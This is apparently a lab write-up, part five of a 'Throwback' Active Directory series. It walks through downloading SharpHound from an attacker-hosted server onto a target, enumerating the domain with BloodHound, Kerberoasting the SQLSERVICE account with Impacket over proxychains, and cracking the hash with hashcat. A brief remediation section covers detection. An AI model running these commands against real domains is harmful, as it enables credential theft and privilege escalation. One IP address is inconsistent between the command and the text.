Throwback — Part 5 — Domain Enumeration & Kerberoast

At this stage we still have access to THROWBACK-PROD as a domain user called BlaireJ. In order to gain higher privileges in the domain, e.g. Domain Admin, we should now enumerate the Active Directory Domain.

Collecting the Data

First of all we need to collect data on the domain. After that we can analyze the data offline on the attacker machine. To collect data I have use SharpHound. I have hosted SharpHound.exe on the attacker machine and downloaded to the target:

curl 10.50.71.46:8080/SharpHound.exe -o SharpHound.exe

On the target I have used the following command to run the binary and collect all required data:

.\SharpHound.exe -c All -d THROWBACK.local --zipfilename loot.zip

The “-c All” parameter describes to collect all available data, such es Domain Users, Groups, etc. The “-d THROWBACK.local” parameter describes which domain to enumerate. With “ — zipfilename loot.zip” we can specify the zip file name that will contain all the data. Finall I have transfered the zip to the attacker machine.

Analyzing the Data

After downloading the data, I could import it to Bloodhound by just drag and dropping it in the UI. Bloodhound has some queries build in, that can be used. First I have enumerated the Domain Admins:

Next I have looked into the kerberoastable users:

KRBTGT is a default account that is used for Kerberos authentication. It has a very secure password by default, so most of the time it won’t make sense to target that user. But there is another user called SQLSERVICE, which is not default. In the next step this user will be targetted.

Kerberoasting

Kerberoasting uses a feature in Kerberos to retrieve the Hash of a service account.

To perform the Kerberoasting attack, I have used the GetUserSPNs script from Impacket. If you have impacket installed on Kali Linux, this script should be located at /usr/bin/impacket-GetUserSPNs. To request a ticket I have used HumphreyW’s account:

proxychains /usr/bin/impacket-GetUserSPNs THROWBACK.local/HumphreyW -dc-ip 10.200.70.117 -request

With “-dc-ip 10.220.70.117” you will need to specify the IP address of the domain controller. With “-request” the script won’t just output account with service principal names, but will also to a request for a ticket. This is needed in order to retrieve the hash of the service account. Finally the command has to be tunneld into the network with proxychains. For that reason I have already setup a socks4 proxy on one of the compromised hosts. Finally you should retrieve the hash of the SQLSERVICE account:

Cracking the Hash

Now we can use hashcat to crack the hash. First I have saved the hash in a file called “hash.txt”. I have used rockyou.txt as wordlist for the wordlist attack. The hash mode to use is 13100:

.\hashcat.exe -m 13100 -a 0 hash.txt rockyou.txt

Finally I was able to crack the hash in just a second:

Remediation

In this article we have just used normal functionality of Active Directory. In order to protect against these types of attacks, there should be good monitor set in place. There should be an alert, when a user requests to much data from the domain controller. This is what SharpHound does.

Kerberoasting is a very stealthy technique, especially when it is normal in the environment that the user, which is used to attack, uses the service often. But it can be detected when a user requested a ticket and some time later someone authenticated as the service account. But it is still hard to detect such an attack.